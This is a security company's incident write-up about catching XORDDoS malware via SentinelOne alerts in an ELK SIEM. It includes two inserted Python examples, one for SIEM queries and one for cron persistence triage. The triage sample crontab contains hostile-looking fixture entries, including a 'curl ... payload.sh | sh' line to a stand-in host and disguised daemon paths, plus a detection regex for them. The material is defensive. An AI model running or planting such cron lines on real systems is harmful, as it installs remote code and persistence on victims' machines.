XORDDoS Detection on a Customer’s Machine


The Alert

As part of our 24/7 managed SOC service, we aggregate logs from client endpoints into our centralized ELK SIEM platform, giving us full visibility and correlation across the entire infrastructure.

One such log, sent by a SentinelOne Linux agent, was flagged in ELK for immediate attention. The alert pointed to a malware detection event, and our SOC team began reviewing the data.

In the log details, within the incident timeline and event details, we saw:
sentinel_one.threat.name: XORDDoS

Identification

Alert in ELK:

Opening the Incidents view, we could see the threat alert listed as “Malware Threat Detected”. Expanding its details gives more information:

Opening the Kibana explorer from the previous view, we can go into the timeline for this threat:

Then we add a column to display the detected malware name by choosing sentinel_one.threat.name from the Selected fields group on the left:

With this column added to the view, we see the name of the detected malware, which in our case was XORDDoS:
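The same identification step, done programmatically rather than by clicking through Kibana, as an added example that is not BlueGrid's or SentinelOne's code. It reads SentinelOne threat documents in the shape the Elastic SIEM stores them, builds the KQL and query-DSL filters that correspond to the column we added, and summarises detections per host so an analyst queue can be fed automatically. The field sentinel_one.threat.name comes from the post; host.name, @timestamp and sentinel_one.threat.mitigation_status (and its values) are assumed field names, and the sample documents are constructed for this example.

```python
"""Escalation logic for SentinelOne threat events held in an ELK SIEM.

Added example, not BlueGrid's or SentinelOne's code. Only
sentinel_one.threat.name is taken from the post; the other field names
and the sample documents below are assumptions constructed for this example.
"""
import json
from collections import Counter

# Constructed sample documents, shaped like Elasticsearch _source entries
# from the SentinelOne integration. Hostnames and timestamps are invented.
SAMPLE_DOCS = [
    {"@timestamp": "2024-05-02T10:14:03Z", "host": {"name": "lnx-web-01"},
     "sentinel_one": {"threat": {"name": "XORDDoS", "mitigation_status": "mitigated"}}},
    {"@timestamp": "2024-05-02T10:14:09Z", "host": {"name": "lnx-web-01"},
     "sentinel_one": {"threat": {"name": "XORDDoS", "mitigation_status": "not_mitigated"}}},
    {"@timestamp": "2024-05-02T10:20:41Z", "host": {"name": "lnx-db-02"},
     "sentinel_one": {"threat": {"name": "EICAR-Test-File", "mitigation_status": "mitigated"}}},
    {"@timestamp": "2024-05-02T10:21:00Z", "host": {"name": "lnx-db-02"},
     "process": {"name": "cron"}},  # ordinary telemetry with no threat field
]


def get_field(doc, dotted):
    """Walk a nested document by a dotted ECS-style path; None if any part is absent."""
    cur = doc
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def kql_for_threat(threat_name):
    """KQL filter equivalent to adding the column in Kibana and reading its value."""
    return f'sentinel_one.threat.name : "{threat_name}"'


def es_query_for_threat(threat_name=None, since="now-24h"):
    """Elasticsearch query DSL body that a scheduled SIEM job can run.

    Without a threat name it returns every document that carries a threat
    field at all, which is the broad "Malware Threat Detected" view.
    """
    must = [
        {"exists": {"field": "sentinel_one.threat.name"}},
        {"range": {"@timestamp": {"gte": since}}},
    ]
    if threat_name:
        must.append({"term": {"sentinel_one.threat.name": threat_name}})
    return {"query": {"bool": {"must": must}}, "sort": [{"@timestamp": "desc"}]}


def escalate(docs, threat_name):
    """Summarise matching events per host.

    Hosts with an event the agent did not report as mitigated are listed
    separately so the analyst knows where manual action is still required.
    """
    hits = [d for d in docs if get_field(d, "sentinel_one.threat.name") == threat_name]
    per_host = Counter(get_field(d, "host.name") for d in hits)
    unmitigated = sorted({
        get_field(d, "host.name") for d in hits
        if get_field(d, "sentinel_one.threat.mitigation_status") != "mitigated"
    })
    return {
        "threat": threat_name,
        "events": len(hits),
        "hosts": dict(per_host),
        "needs_manual_action": unmitigated,
    }


if __name__ == "__main__":
    print(kql_for_threat("XORDDoS"))
    print(json.dumps(es_query_for_threat("XORDDoS"), indent=2))
    print(json.dumps(escalate(SAMPLE_DOCS, "XORDDoS"), indent=2))
```

The `escalate` summary is what an ELK watcher or a small cron-driven script would hand to the on-call analyst: one line per affected host, with the hosts that still need hands-on work called out, rather than a raw stream of agent events.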

Response

XORDDoS is a stealthy Linux-targeting Trojan designed to recruit systems into botnets for DDoS attacks. While SentinelOne had already blocked the threat, it was our ELK stack that brought it to the surface and escalated it to human analysts in real time:

  • SentinelOne caught the threat
  • ELK correlated and escalated the alert
  • Our team took action immediately

Isolate the Host
We instantly removed the affected machine from the network to prevent any potential lateral movement or outbound command-and-control communication.

Scan & Clean
A full manual review and additional scans were performed. We confirmed that all malicious components were quarantined and removed — including any persistence mechanisms like cron jobs or disguised binaries.

Sweep the Network
We extended the investigation to the entire network segment. Fortunately, thanks to early detection, there were no signs of further compromise.
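The "Scan & Clean" step above mentions checking cron jobs and disguised binaries as persistence mechanisms. As an added example (not BlueGrid's procedure or tooling), here is a small triage script that parses an /etc/crontab-style file and flags entries that match common persistence patterns: commands executed from world-writable scratch directories, hidden path components, binaries named like system daemons but living outside the standard binary directories, and download-and-pipe-to-shell one-liners. The heuristics, directory lists and the sample crontab are this example's own assumptions and are constructed, not indicators taken from the incident.

```python
"""Cron persistence triage for a post-detection host review.

Added example, not BlueGrid's tooling. The heuristics and the sample
crontab below are constructed for illustration; they are not indicators
from the incident described in the post.
"""
import re

# Heuristic lists (assumptions of this example, tune per environment).
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
STANDARD_BIN_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                     "/usr/local/bin/", "/usr/local/sbin/", "/usr/lib/", "/lib/")
LOOKALIKE_NAMES = {"sshd", "cron", "crond", "systemd", "kworker", "kthreadd", "udevd"}
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|da)?sh\b")

# Constructed sample /etc/crontab: two benign entries, three that should be flagged.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0 3 * * * root /usr/local/bin/backup.sh
*/3 * * * * root /tmp/.x/sshd > /dev/null 2>&1
@reboot root /var/tmp/update.sh
*/5 * * * * root curl -s http://example.invalid/payload.sh | sh
"""


def parse_system_crontab(text):
    """Parse /etc/crontab-style lines into schedule, user and command."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split(None, 1)[0]:  # SHELL=, PATH=, MAILTO= assignments
            continue
        if line.startswith("@"):           # @reboot / @daily style shortcuts
            parts = line.split(None, 2)
            if len(parts) < 3:
                continue
            schedule, user, command = parts
        else:                              # five schedule fields, user, command
            parts = line.split(None, 6)
            if len(parts) < 7:
                continue
            schedule, user, command = " ".join(parts[:5]), parts[5], parts[6]
        entries.append({"schedule": schedule, "user": user, "command": command, "raw": raw})
    return entries


def suspicious_reasons(command):
    """Return the list of heuristic reasons a cron command deserves a closer look."""
    reasons = []
    tokens = re.split(r"[\s;&|><]+", command)
    paths = [tok for tok in tokens if tok.startswith("/")]
    if any(p.startswith(SUSPICIOUS_DIRS) for p in paths):
        reasons.append("executes from a world-writable scratch directory")
    if any("/." in p for p in paths):
        reasons.append("references a hidden path component")
    for p in paths:
        name = p.rsplit("/", 1)[-1]
        if name in LOOKALIKE_NAMES and not p.startswith(STANDARD_BIN_DIRS):
            reasons.append(f"'{name}' mimics a system daemon but lives outside standard bin dirs")
    if DOWNLOAD_EXEC.search(command):
        reasons.append("downloads and pipes a script straight into a shell")
    return reasons


def triage_crontab(text):
    """Return (entry, reasons) pairs for every entry that trips at least one heuristic."""
    flagged = []
    for entry in parse_system_crontab(text):
        reasons = suspicious_reasons(entry["command"])
        if reasons:
            flagged.append((entry, reasons))
    return flagged


if __name__ == "__main__":
    for entry, reasons in triage_crontab(SAMPLE_CRONTAB):
        print(f"[{entry['user']}] {entry['schedule']}  {entry['command']}")
        for reason in reasons:
            print(f"    - {reason}")
```

On a real host the same function would be run over /etc/crontab, the files under /etc/cron.d and each user's crontab, and anything it flags is reviewed by hand before the machine is returned to the network; the heuristics produce leads, not verdicts.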

With the machine cleaned, the alert resolved, and the surrounding systems cleared, we closed the incident and delivered a post-mortem report to the client. No disruption, no data leakage — just fast detection and even faster response.

Ivan Dabić


Co-founder and CEO of BlueGrid.io, with a background in cloud infrastructure, distributed systems, monitoring, and security operations. He works closely with engineering teams to build and operate reliable systems while documenting both technical and organizational aspects of modern engineering work.

Ivan is a metalhead and a big fan of the cyberpunk movie genre. If you are his Secret Santa, go with a Star Wars Lego box!
